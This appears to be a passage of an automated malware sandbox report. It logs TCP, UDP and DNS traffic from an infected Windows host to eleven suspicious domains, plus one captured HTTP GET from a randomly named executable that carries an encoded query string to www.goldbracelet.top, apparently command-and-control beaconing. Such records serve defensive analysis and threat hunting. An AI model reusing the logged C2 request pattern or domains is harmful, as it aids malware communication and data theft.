                                                                  Jan 10, 2025 18:52:35.300237894 CET5002380192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:36.319056034 CET5002480192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:36.323879004 CET8050024170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:36.323976994 CET5002480192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:36.339319944 CET5002480192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:36.344166040 CET8050024170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:37.262958050 CET8050024170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:37.266720057 CET8050024170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:37.266758919 CET8050024170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:37.266815901 CET5002480192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:37.266865015 CET5002480192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:37.847012997 CET5002480192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:38.866056919 CET5002580192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:38.870953083 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.871098042 CET5002580192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:38.887358904 CET5002580192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:38.892240047 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892255068 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892288923 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892298937 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892379045 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892390013 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892440081 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892450094 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892458916 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:39.931550026 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:39.932400942 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:39.932431936 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:39.932449102 CET5002580192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:39.932485104 CET5002580192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:40.396538973 CET5002580192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:41.413851023 CET5002680192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:41.418723106 CET8050026170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:41.418878078 CET5002680192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:41.428215027 CET5002680192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:41.434099913 CET8050026170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:42.296263933 CET8050026170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:42.297291994 CET8050026170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:42.297375917 CET5002680192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:42.297384977 CET8050026170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:42.297431946 CET5002680192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:42.300631046 CET5002680192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:42.305412054 CET8050026170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:47.342681885 CET5002780192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:47.347654104 CET805002766.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:47.347791910 CET5002780192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:47.362998962 CET5002780192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:47.367784023 CET805002766.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:48.100738049 CET805002766.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:48.100764036 CET805002766.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:48.100775003 CET805002766.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:48.100838900 CET5002780192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:48.101201057 CET805002766.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:48.101254940 CET5002780192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:48.916904926 CET5002780192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:49.944180012 CET5002880192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:49.948998928 CET805002866.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:49.952147007 CET5002880192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:49.967571020 CET5002880192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:49.972400904 CET805002866.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:50.700732946 CET805002866.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:50.700750113 CET805002866.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:50.700761080 CET805002866.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:50.700862885 CET5002880192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:50.701518059 CET805002866.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:50.702694893 CET5002880192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:51.471927881 CET5002880192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:52.491247892 CET5002980192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:52.495992899 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:52.496212959 CET5002980192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:52.512552023 CET5002980192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:52.517390013 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:52.517414093 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:52.517431021 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:52.517479897 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:52.517555952 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:52.517565966 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:52.517649889 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:52.517659903 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:52.517684937 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:53.207634926 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:53.207662106 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:53.207673073 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:53.207684040 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:53.207751989 CET5002980192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:53.208043098 CET805002966.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:53.208096027 CET5002980192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:54.018949986 CET5002980192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:55.037642956 CET5003080192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:55.042520046 CET805003066.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:55.042642117 CET5003080192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:55.052181005 CET5003080192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:55.056972980 CET805003066.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:55.759372950 CET805003066.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:55.762459040 CET805003066.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:52:55.762639999 CET5003080192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:55.764707088 CET5003080192.168.2.466.235.200.145
                                                                  Jan 10, 2025 18:52:55.769510031 CET805003066.235.200.145192.168.2.4
                                                                  Jan 10, 2025 18:53:01.144524097 CET5003180192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:01.150376081 CET805003185.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:01.150511026 CET5003180192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:01.192965984 CET5003180192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:01.197808981 CET805003185.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:02.706419945 CET5003180192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:02.711529970 CET805003185.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:02.711622000 CET5003180192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:03.769733906 CET5003280192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:03.774507046 CET805003285.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:03.774584055 CET5003280192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:03.855757952 CET5003280192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:03.860583067 CET805003285.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:05.362912893 CET5003280192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:05.367989063 CET805003285.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:05.368249893 CET5003280192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:06.381764889 CET5003380192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:06.386668921 CET805003385.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:06.386759043 CET5003380192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:06.404608011 CET5003380192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:06.409467936 CET805003385.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:06.409481049 CET805003385.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:06.409562111 CET805003385.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:06.409571886 CET805003385.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:06.409584999 CET805003385.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:06.409627914 CET805003385.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:06.409637928 CET805003385.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:06.409713030 CET805003385.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:06.409723043 CET805003385.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:07.909570932 CET5003380192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:07.914678097 CET805003385.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:07.914769888 CET5003380192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:08.929079056 CET5003480192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:08.933892012 CET805003485.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:08.934024096 CET5003480192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:08.944063902 CET5003480192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:08.948893070 CET805003485.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:09.657424927 CET805003485.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:09.657516003 CET805003485.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:09.657661915 CET5003480192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:09.661027908 CET5003480192.168.2.485.159.66.93
                                                                  Jan 10, 2025 18:53:09.665842056 CET805003485.159.66.93192.168.2.4
                                                                  Jan 10, 2025 18:53:14.714395046 CET5003580192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:14.719185114 CET8050035156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:14.719260931 CET5003580192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:14.735112906 CET5003580192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:14.740570068 CET8050035156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:15.725756884 CET8050035156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:15.725908041 CET8050035156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:15.725954056 CET5003580192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:16.237699986 CET5003580192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:17.256340027 CET5003680192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:17.261271954 CET8050036156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:17.261425018 CET5003680192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:17.276911974 CET5003680192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:17.281723022 CET8050036156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:18.300914049 CET8050036156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:18.300945044 CET8050036156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:18.301031113 CET5003680192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:18.784666061 CET5003680192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:19.804874897 CET5003780192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:19.809758902 CET8050037156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:19.809878111 CET5003780192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:19.826001883 CET5003780192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:19.831002951 CET8050037156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:19.831017017 CET8050037156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:19.831028938 CET8050037156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:19.831041098 CET8050037156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:19.831120014 CET8050037156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:19.831130981 CET8050037156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:19.831142902 CET8050037156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:19.831152916 CET8050037156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:19.831166029 CET8050037156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:21.086890936 CET8050037156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:21.087193966 CET8050037156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:21.087236881 CET5003780192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:21.331423044 CET5003780192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:22.350086927 CET5003880192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:22.355083942 CET8050038156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:22.355282068 CET5003880192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:22.369898081 CET5003880192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:22.375777006 CET8050038156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:23.350660086 CET8050038156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:23.350687981 CET8050038156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:23.350863934 CET5003880192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:23.353784084 CET5003880192.168.2.4156.253.8.115
                                                                  Jan 10, 2025 18:53:23.358608961 CET8050038156.253.8.115192.168.2.4
                                                                  Jan 10, 2025 18:53:28.409370899 CET5003980192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:28.414545059 CET805003913.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:28.416186094 CET5003980192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:28.435842037 CET5003980192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:28.441359043 CET805003913.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:29.024465084 CET805003913.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:29.024555922 CET805003913.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:29.024785995 CET5003980192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:29.941018105 CET5003980192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:30.959846020 CET5004080192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:30.964898109 CET805004013.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:30.964982986 CET5004080192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:30.980751991 CET5004080192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:30.985658884 CET805004013.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:32.487730026 CET5004080192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:32.535240889 CET805004013.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:33.506854057 CET5004180192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:33.511797905 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:33.511876106 CET5004180192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:33.527383089 CET5004180192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:33.532322884 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:33.532334089 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:33.532346010 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:33.532429934 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:33.532453060 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:33.532461882 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:33.532517910 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:33.532527924 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:33.532537937 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:34.086782932 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:34.086812019 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:34.086864948 CET805004113.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:34.086977005 CET5004180192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:34.091233969 CET5004180192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:34.350085020 CET805004013.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:34.351193905 CET5004080192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:35.039612055 CET5004180192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:36.053725958 CET5004280192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:36.058588982 CET805004213.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:36.058660030 CET5004280192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:36.068082094 CET5004280192.168.2.413.248.169.48
                                                                  Jan 10, 2025 18:53:36.073472977 CET805004213.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:39.659254074 CET805004213.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:39.659476042 CET805004213.248.169.48192.168.2.4
                                                                  Jan 10, 2025 18:53:39.659574032 CET5004280192.168.2.413.248.169.48

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 10, 2025 18:51:08.750119925 CET6471053192.168.2.41.1.1.1
                                                                  Jan 10, 2025 18:51:08.949014902 CET53647101.1.1.1192.168.2.4
                                                                  Jan 10, 2025 18:51:24.618014097 CET5150353192.168.2.41.1.1.1
                                                                  Jan 10, 2025 18:51:25.185996056 CET53515031.1.1.1192.168.2.4
                                                                  Jan 10, 2025 18:51:38.636116982 CET5543653192.168.2.41.1.1.1
                                                                  Jan 10, 2025 18:51:39.009188890 CET53554361.1.1.1192.168.2.4
                                                                  Jan 10, 2025 18:51:52.538244963 CET5584653192.168.2.41.1.1.1
                                                                  Jan 10, 2025 18:51:52.602622986 CET53558461.1.1.1192.168.2.4
                                                                  Jan 10, 2025 18:52:05.757311106 CET5557853192.168.2.41.1.1.1
                                                                  Jan 10, 2025 18:52:06.198546886 CET53555781.1.1.1192.168.2.4
                                                                  Jan 10, 2025 18:52:19.833429098 CET6553253192.168.2.41.1.1.1
                                                                  Jan 10, 2025 18:52:19.844885111 CET53655321.1.1.1192.168.2.4
                                                                  Jan 10, 2025 18:52:33.293876886 CET6066153192.168.2.41.1.1.1
                                                                  Jan 10, 2025 18:52:33.771558046 CET53606611.1.1.1192.168.2.4
                                                                  Jan 10, 2025 18:52:47.319438934 CET5800953192.168.2.41.1.1.1
                                                                  Jan 10, 2025 18:52:47.340240955 CET53580091.1.1.1192.168.2.4
                                                                  Jan 10, 2025 18:53:00.788393974 CET5654253192.168.2.41.1.1.1
                                                                  Jan 10, 2025 18:53:01.123945951 CET53565421.1.1.1192.168.2.4
                                                                  Jan 10, 2025 18:53:14.679178953 CET6445453192.168.2.41.1.1.1
                                                                  Jan 10, 2025 18:53:14.711869001 CET53644541.1.1.1192.168.2.4
                                                                  Jan 10, 2025 18:53:28.366616964 CET6300653192.168.2.41.1.1.1
                                                                  Jan 10, 2025 18:53:28.406824112 CET53630061.1.1.1192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 10, 2025 18:51:08.750119925 CET192.168.2.41.1.1.10xfab7Standard query (0)www.goldbracelet.topA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:51:24.618014097 CET192.168.2.41.1.1.10xb76bStandard query (0)www.pku-cs-cjw.topA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:51:38.636116982 CET192.168.2.41.1.1.10x4338Standard query (0)www.ausyva4.topA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:51:52.538244963 CET192.168.2.41.1.1.10xc0fcStandard query (0)www.969-usedcar02.shopA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:52:05.757311106 CET192.168.2.41.1.1.10xd556Standard query (0)www.juewucangku.xyzA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:52:19.833429098 CET192.168.2.41.1.1.10xfa68Standard query (0)www.startsomething.xyzA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:52:33.293876886 CET192.168.2.41.1.1.10x1978Standard query (0)www.opro.vipA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:52:47.319438934 CET192.168.2.41.1.1.10xceccStandard query (0)www.santillo.betA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:53:00.788393974 CET192.168.2.41.1.1.10x7c4fStandard query (0)www.esnafus.onlineA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:53:14.679178953 CET192.168.2.41.1.1.10x1c8Standard query (0)www.sssvip2.shopA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:53:28.366616964 CET192.168.2.41.1.1.10x16c9Standard query (0)www.shipley.groupA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 10, 2025 18:51:08.949014902 CET1.1.1.1192.168.2.40xfab7No error (0)www.goldbracelet.top104.21.36.239A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:51:08.949014902 CET1.1.1.1192.168.2.40xfab7No error (0)www.goldbracelet.top172.67.201.49A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:51:25.185996056 CET1.1.1.1192.168.2.40xb76bNo error (0)www.pku-cs-cjw.top187370.github.ioCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 10, 2025 18:51:25.185996056 CET1.1.1.1192.168.2.40xb76bNo error (0)187370.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:51:25.185996056 CET1.1.1.1192.168.2.40xb76bNo error (0)187370.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:51:25.185996056 CET1.1.1.1192.168.2.40xb76bNo error (0)187370.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:51:25.185996056 CET1.1.1.1192.168.2.40xb76bNo error (0)187370.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:51:39.009188890 CET1.1.1.1192.168.2.40x4338No error (0)www.ausyva4.top104.21.48.233A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:51:39.009188890 CET1.1.1.1192.168.2.40x4338No error (0)www.ausyva4.top172.67.188.88A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:51:52.602622986 CET1.1.1.1192.168.2.40xc0fcNo error (0)www.969-usedcar02.shop199.59.243.228A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:52:06.198546886 CET1.1.1.1192.168.2.40xd556No error (0)www.juewucangku.xyz8.136.96.106A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:52:19.844885111 CET1.1.1.1192.168.2.40xfa68No error (0)www.startsomething.xyz69.57.163.64A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:52:33.771558046 CET1.1.1.1192.168.2.40x1978No error (0)www.opro.vipoverdue.aliyun.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 10, 2025 18:52:33.771558046 CET1.1.1.1192.168.2.40x1978No error (0)overdue.aliyun.com170.33.13.246A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:52:47.340240955 CET1.1.1.1192.168.2.40xceccNo error (0)www.santillo.betsantillo.betCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 10, 2025 18:52:47.340240955 CET1.1.1.1192.168.2.40xceccNo error (0)santillo.bet66.235.200.145A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:53:01.123945951 CET1.1.1.1192.168.2.40x7c4fNo error (0)www.esnafus.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 10, 2025 18:53:01.123945951 CET1.1.1.1192.168.2.40x7c4fNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 10, 2025 18:53:01.123945951 CET1.1.1.1192.168.2.40x7c4fNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:53:14.711869001 CET1.1.1.1192.168.2.40x1c8No error (0)www.sssvip2.shop156.253.8.115A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:53:28.406824112 CET1.1.1.1192.168.2.40x16c9No error (0)www.shipley.group13.248.169.48A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 18:53:28.406824112 CET1.1.1.1192.168.2.40x16c9No error (0)www.shipley.group76.223.54.146A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • www.goldbracelet.top
                                                                  • www.pku-cs-cjw.top
                                                                  • www.ausyva4.top
                                                                  • www.969-usedcar02.shop
                                                                  • www.juewucangku.xyz
                                                                  • www.startsomething.xyz
                                                                  • www.opro.vip
                                                                  • www.santillo.bet
                                                                  • www.esnafus.online
                                                                  • www.sssvip2.shop
                                                                  • www.shipley.group

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449736104.21.36.239801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:51:08.970375061 CET462OUTGET /3e00/?Ol=yN0LtN-HDTPXX&3h=vcWi2Nuzfs8bFUYHM3WHAx3tRht2hRDvXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCKhn1cqd0Bfa9GTR6+v7wltgiOCNeedM3Uw1s= HTTP/1.1
                                                                  Host: www.goldbracelet.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:51:09.574768066 CET777INHTTP/1.1 403 Forbidden
                                                                  Date: Fri, 10 Jan 2025 17:51:09 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
